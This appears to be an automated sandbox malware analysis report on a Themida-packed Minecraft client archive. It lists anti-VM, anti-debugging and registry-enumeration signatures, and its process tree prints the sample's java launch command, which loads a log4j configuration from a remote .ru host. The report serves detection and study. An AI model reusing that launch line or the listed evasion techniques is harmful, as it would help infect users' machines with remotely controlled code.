Malware Analysis Report

2024-10-10 08:10

Sample ID 240611-p4sfaaxejf
Target nightware_pasted.zip
SHA256 12c03ef329d173728898959b9f406d2fcecec97b21489ab1f8f9acca5066b036
Tags
themida evasion
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

12c03ef329d173728898959b9f406d2fcecec97b21489ab1f8f9acca5066b036

Threat Level: Likely malicious

The file nightware_pasted.zip was found to be: Likely malicious.

Malicious Activity Summary

themida evasion

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Checks BIOS information in registry

Themida packer

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Unsigned PE

Enumerates physical storage devices

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-11 12:54

Signatures

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-11 12:53

Reported

2024-06-11 12:59

Platform

win11-20240426-en

Max time kernel

274s

Max time network

271s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\nightware_pasted.zip

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A
N/A N/A C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A
N/A N/A C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2551177587-3778486488-1329702901-1000\{53AD200A-852E-43D8-B5AB-B07AAFDC3AD1} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2892 wrote to memory of 1156 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe
PID 2892 wrote to memory of 1156 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe
PID 2740 wrote to memory of 2588 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe
PID 2740 wrote to memory of 2588 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe
PID 2588 wrote to memory of 4900 N/A C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe C:\Windows\SYSTEM32\rundll32.exe
PID 2588 wrote to memory of 4900 N/A C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe C:\Windows\SYSTEM32\rundll32.exe
PID 4900 wrote to memory of 3908 N/A C:\Windows\SYSTEM32\rundll32.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3908 N/A C:\Windows\SYSTEM32\rundll32.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 1660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 1660 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 4392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 2704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 2704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 1124 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 1124 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 1124 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 1124 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 1124 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 1124 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 1124 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 1124 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 1124 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 1124 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 1124 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3908 wrote to memory of 1124 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\nightware_pasted.zip

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\nightware_pasted\start.bat" "

C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe

jvm\bin\java.exe -noverify -Xmx6144M -Djava.library.path=natives -Dlog4j.configurationFile=https://sk3dsuite.ru/assets/log4j2.xml -cp libraries\*;beta.jar net.minecraft.client.main.Main --username TEST --accessToken 0 --version 1.12.2 --width 1366 --height 768 --userProperties {} --gameDir client

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\nightware_pasted\start.bat" "

C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe

jvm\bin\java.exe -noverify -Xmx6144M -Djava.library.path=natives -Dlog4j.configurationFile=https://sk3dsuite.ru/assets/log4j2.xml -cp libraries\*;beta.jar net.minecraft.client.main.Main --username TEST --accessToken 0 --version 1.12.2 --width 1366 --height 768 --userProperties {} --gameDir client

C:\Windows\SYSTEM32\rundll32.exe

rundll32 url.dll,FileProtocolHandler https://discord.gg/HRq5DKFxTQ

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/HRq5DKFxTQ

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffacc293cb8,0x7ffacc293cc8,0x7ffacc293cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2556 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4952 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4636 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004C0

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\nightware_pasted\start.bat" "

C:\Users\Admin\Documents\nightware_pasted\jvm\bin\java.exe

jvm\bin\java.exe -noverify -Xmx6144M -Djava.library.path=natives -Dlog4j.configurationFile=https://sk3dsuite.ru/assets/log4j2.xml -cp libraries\*;beta.jar net.minecraft.client.main.Main --username TEST --accessToken 0 --version 1.12.2 --width 1366 --height 768 --userProperties {} --gameDir client

C:\Windows\SYSTEM32\rundll32.exe

rundll32 url.dll,FileProtocolHandler https://discord.gg/HRq5DKFxTQ

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/HRq5DKFxTQ

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffacc293cb8,0x7ffacc293cc8,0x7ffacc293cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,11492023739146333046,991796599914357616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1656 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

